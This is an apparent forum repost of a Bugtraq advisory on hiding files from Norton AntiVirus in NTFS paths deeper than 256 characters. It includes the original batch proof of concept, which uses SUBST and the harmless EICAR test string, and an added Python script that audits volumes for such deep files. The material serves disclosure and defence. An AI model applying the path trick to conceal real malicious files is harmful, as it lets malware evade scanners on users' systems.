This was posted to bugtraq by Hans Somers on Jan 30th:

===BEGIN POST===

Long path exploit on NTFS
=========================
The filesystem NTFS seems to be a hiding place for viruses if you use a file path which exceeds 256 characters.

What is the case?
The file path (drive + folder path + file name) can theoretically take up to 32000 characters if the filesystem in use is NTFS. However, the way in which Windows NT (4.0, 2000 and XP) accesses this filesystem imposes a maximum of 256 characters. If you try to go deeper, you will experience a "Path too long" error. In these operating systems there is a way to substitute a long folder path, using the "SUBST" command. If you change your current drive to the substituted drive, the path length is reset to 3 (Q:\ e.g.) and Windows NT allows you to create an even deeper path.
Normally this would not alarm anyone; however, I discovered that my favorite virus scanner (Norton AntiVirus) was not able to follow the deep path where I created the EICAR test string. So I created a very simple batch file to demonstrate this exploit. My virus scanner will only find this virus if the SUBST drive is available during the scan.

I have tested this on the following platforms:
Windows NT 4.0 SP4
Windows NT 4.0 SP6a
Windows 2000 Professional SP2
Windows XP Pro
I have determined that the following versions of Norton AntiVirus will not follow the deep path during a complete scan:
Norton AntiVirus 5.0
Norton AntiVirus 7.5.1
Norton Antivirus 8.00.58

I suspect that other virus scanners will encounter the same "bug", so you might try the sample script that I created. Additionally, other tools (quota managers, inventory tools etc.) that gather information from an NTFS partition might reveal the same bug.

After running the script below, remove the substituted drive (SUBST Q: /D) and run a full scan on your C: partition. I suspect that the EICAR virus will not be found.
Additionally, re-create the substituted drive and re-run the scan. Under normal conditions the EICAR virus will be found and removed (depending on your settings).

As far as I can see, there is no real remedy against this exploit. I hope this message will pass through the proper channels, so the responsible parties will act on this.

Responses on this posting at my address are welcome.

Hans Somers (hans.somers@nl.abnamro.com)

Sample script:
===========
@echo off
cls
echo Start test-script NTFS-limit
@echo Create a filepath to the limit of NTFS
REM The md, cd and subst commands below are each a single command line; the
REM mailing list wrapped them. The path is c:\temp plus nineteen folders of
REM ten characters and one of nine characters.
md c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
cd c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
@echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.
REM In a batch file %% and ^^ are escapes, so the file receives a single % and ^.
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR1.COM >NUL
@echo Create a subst-drive Q: for this path
subst Q: c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\123456789
@echo Create an even deeper filepath (thus exceeding the limit of NTFS's explorer)
REM Relative to Q:\ the path length starts again at 3, so this md succeeds
REM where the same folders spelled out from C:\ would give "Path too long".
md Q:\1234567890\1234567890\1234567890
@echo Change current folder into "the deep"
Q:
cd Q:\1234567890\1234567890\1234567890
@echo Create the Eicar test-string
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR2.COM >NUL
EICAR2.COM
echo .
echo End of test-script

===END POST===

I'd like to reiterate that these are not my findings, I'm merely passing the information on to these forums.
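An audit script that is not part of the post above (my own added example, not Hans Somers's batch file or any Norton tool): it walks a tree using Windows' extended-length \\?\ prefix so it can reach the folders the SUBST trick creates, and reports every file whose ordinary absolute path no longer fits in MAX_PATH, which is exactly the set of files a scanner bound to the 256/260-character limit would skip when started at the volume root. The names find_deep_files, build_deep_tree and demo and the MARKER.TXT file are my own choices; the sample tree is constructed in a temporary folder with a harmless marker file rather than EICAR, and the prefix is only applied on Windows so the audit also runs elsewhere.

```python
import os
import sys
import tempfile

MAX_PATH = 260               # classic Win32 limit, terminating NUL included
EXTENDED_PREFIX = "\\\\?\\"  # the literal \\?\ extended-length prefix

def extended(path):
    """Absolute path in extended-length form on Windows; unchanged elsewhere."""
    path = os.path.abspath(path)
    if sys.platform == "win32" and not path.startswith(EXTENDED_PREFIX):
        return EXTENDED_PREFIX + path
    return path

def find_deep_files(root, limit=MAX_PATH):
    """Walk root via extended-length paths and return (path, length) for each
    file whose plain absolute path no longer fits in limit: a file that a
    MAX_PATH-bound scan started at the volume root would never open."""
    hits = []
    for dirpath, _dirs, files in os.walk(extended(root)):
        plain = dirpath[len(EXTENDED_PREFIX):] if dirpath.startswith(EXTENDED_PREFIX) else dirpath
        for name in files:
            full = os.path.join(plain, name)
            if len(full) + 1 > limit:    # +1 for the NUL that MAX_PATH counts
                hits.append((full, len(full)))
    return hits

def build_deep_tree(base, depth, component="1234567890"):
    """Constructed sample: nest `depth` folders named like the posted script
    and leave a harmless marker file (not EICAR) at the bottom."""
    cur = extended(base)
    for _ in range(depth):
        cur = os.path.join(cur, component)
        os.mkdir(cur)                    # succeeds past 260 chars thanks to the prefix
    marker = os.path.join(cur, "MARKER.TXT")
    with open(marker, "w", encoding="ascii") as fh:
        fh.write("constructed marker file\n")
    return marker

def demo(depth=30):
    """Build the constructed tree in a temp folder and return what the audit reports."""
    with tempfile.TemporaryDirectory() as tmp:
        build_deep_tree(tmp, depth)
        return find_deep_files(tmp)

if __name__ == "__main__":
    for path, length in demo():
        print(length, path)
```

On Windows without the LongPathsEnabled policy, the temporary folder's own cleanup may fail with a "path too long" error, the same limitation the post describes; pointing find_deep_files at a real volume root is the intended use.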